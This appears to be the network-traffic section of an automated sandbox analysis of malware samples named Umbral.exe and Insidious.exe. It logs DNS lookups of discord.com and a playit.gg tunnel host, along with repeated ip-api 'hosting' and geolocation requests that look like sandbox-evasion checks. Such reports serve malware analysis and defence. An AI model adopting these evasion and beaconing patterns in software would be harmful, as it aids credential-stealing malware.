                                      Sep 7, 2024 01:48:16.495884895 CEST1.1.1.1192.168.2.50xeb72No error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:18.755196095 CEST1.1.1.1192.168.2.50x8e03No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:18.755196095 CEST1.1.1.1192.168.2.50x8e03No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:18.755196095 CEST1.1.1.1192.168.2.50x8e03No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:18.755196095 CEST1.1.1.1192.168.2.50x8e03No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:18.755196095 CEST1.1.1.1192.168.2.50x8e03No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:23.588996887 CEST1.1.1.1192.168.2.50xe39No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:27.978957891 CEST1.1.1.1192.168.2.50x7c4fNo error (0)stage-von.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:29.613620043 CEST1.1.1.1192.168.2.50xba9cNo error (0)freegeoip.app188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:29.613620043 CEST1.1.1.1192.168.2.50xba9cNo error (0)freegeoip.app188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:30.263555050 CEST1.1.1.1192.168.2.50x3eaaNo error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:30.263555050 CEST1.1.1.1192.168.2.50x3eaaNo error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:30.871162891 CEST1.1.1.1192.168.2.50xb15dNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:30.871162891 CEST1.1.1.1192.168.2.50xb15dNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:30.871162891 CEST1.1.1.1192.168.2.50xb15dNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:30.871162891 CEST1.1.1.1192.168.2.50xb15dNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:30.871162891 CEST1.1.1.1192.168.2.50xb15dNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:35.437235117 CEST1.1.1.1192.168.2.50x2334No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:39.524178028 CEST1.1.1.1192.168.2.50xe054No error (0)stage-von.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:41.451378107 CEST1.1.1.1192.168.2.50x6ec8No error (0)freegeoip.app188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:41.451378107 CEST1.1.1.1192.168.2.50x6ec8No error (0)freegeoip.app188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:42.362329960 CEST1.1.1.1192.168.2.50x46No error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:42.362329960 CEST1.1.1.1192.168.2.50x46No error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:43.047307014 CEST1.1.1.1192.168.2.50x125dNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:43.047307014 CEST1.1.1.1192.168.2.50x125dNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:43.047307014 CEST1.1.1.1192.168.2.50x125dNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:43.047307014 CEST1.1.1.1192.168.2.50x125dNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:43.047307014 CEST1.1.1.1192.168.2.50x125dNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:47.276027918 CEST1.1.1.1192.168.2.50xd9d8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:53.347131968 CEST1.1.1.1192.168.2.50x50b4No error (0)freegeoip.app188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:53.347131968 CEST1.1.1.1192.168.2.50x50b4No error (0)freegeoip.app188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:53.992722988 CEST1.1.1.1192.168.2.50xca80No error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:53.992722988 CEST1.1.1.1192.168.2.50xca80No error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:56.359555006 CEST1.1.1.1192.168.2.50x5570No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:56.359555006 CEST1.1.1.1192.168.2.50x5570No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:56.359555006 CEST1.1.1.1192.168.2.50x5570No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:56.359555006 CEST1.1.1.1192.168.2.50x5570No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:56.359555006 CEST1.1.1.1192.168.2.50x5570No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:59.015814066 CEST1.1.1.1192.168.2.50xf3fNo error (0)stage-von.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:01.347398996 CEST1.1.1.1192.168.2.50x89eeNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:07.129379034 CEST1.1.1.1192.168.2.50xbc28No error (0)freegeoip.app188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:07.129379034 CEST1.1.1.1192.168.2.50xbc28No error (0)freegeoip.app188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:07.992978096 CEST1.1.1.1192.168.2.50xc900No error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:07.992978096 CEST1.1.1.1192.168.2.50xc900No error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:10.794128895 CEST1.1.1.1192.168.2.50xc1eNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:10.794128895 CEST1.1.1.1192.168.2.50xc1eNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:10.794128895 CEST1.1.1.1192.168.2.50xc1eNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:10.794128895 CEST1.1.1.1192.168.2.50xc1eNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:10.794128895 CEST1.1.1.1192.168.2.50xc1eNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • freegeoip.app
                                      • ipbase.com
                                      • discord.com
                                      • ip-api.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549704208.95.112.1803056C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:47:01.671267986 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:47:02.147002935 CEST175INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:02 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549708208.95.112.1802316C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:47:08.838840008 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:47:09.306864977 CEST175INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:09 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 52
                                      X-Rl: 43
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false
                                      Sep 7, 2024 01:47:09.628407955 CEST175INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:09 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 52
                                      X-Rl: 43
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549731208.95.112.1802316C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:47:45.861299038 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:47:46.654433012 CEST379INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:46 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 15
                                      X-Rl: 42
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}
                                      Sep 7, 2024 01:47:46.654838085 CEST379INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:46 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 15
                                      X-Rl: 42
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3192.168.2.549743208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:47:53.281275034 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:47:53.739532948 CEST174INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:53 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 8
                                      X-Rl: 41
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4192.168.2.549753208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:48:02.215751886 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:02.799417019 CEST378INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:02 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 0
                                      X-Rl: 40
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5192.168.2.549764208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:48:10.116369963 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:48:10.702446938 CEST175INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:10 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false
                                      Sep 7, 2024 01:48:10.897876024 CEST175INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:10 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6192.168.2.549769208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:48:16.339941978 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:16.903023958 CEST379INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:16 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 53
                                      X-Rl: 43
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7192.168.2.549779208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:48:23.594831944 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:48:24.062818050 CEST175INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:23 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 46
                                      X-Rl: 42
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8192.168.2.549783208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:48:28.646040916 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:29.244957924 CEST379INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:29 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 41
                                      X-Rl: 41
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9192.168.2.549794208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:48:35.443100929 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:48:35.938791037 CEST175INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:35 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 34
                                      X-Rl: 40
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10192.168.2.549798208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:48:40.707492113 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:41.192111015 CEST379INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:41 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 29
                                      X-Rl: 39
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11192.168.2.549807208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:48:47.281548023 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:48:47.759125948 CEST175INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:47 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 22
                                      X-Rl: 38
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12192.168.2.549812208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:48:53.960026026 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:54.515522003 CEST379INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:54 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 16
                                      X-Rl: 37
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13192.168.2.549822208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:49:01.354572058 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:49:01.843399048 CEST174INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:49:01 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 8
                                      X-Rl: 36
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14192.168.2.549827208.95.112.180
                                      TimestampBytes transferredDirectionData
                                      Sep 7, 2024 01:49:08.684597015 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:49:09.452181101 CEST378INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:49:09 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 1
                                      X-Rl: 35
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549705188.114.97.34435340C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:05 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:05 UTC647INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:05 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:05 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WNTrXfvGxijmU8opH%2BCG%2BxzqOqWQPNByqWoYW2UkYqm9hVm%2BkLrp1bUMN7JqYTf6UonhsEnOLXVi67WOiuXPR5LchbZ%2B6Fl1kj%2BR5xvC42a%2ByMzWF%2FdiepAQYXbMAhJ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2579618098c4e-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:05 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549707104.21.85.1894435340C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:06 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
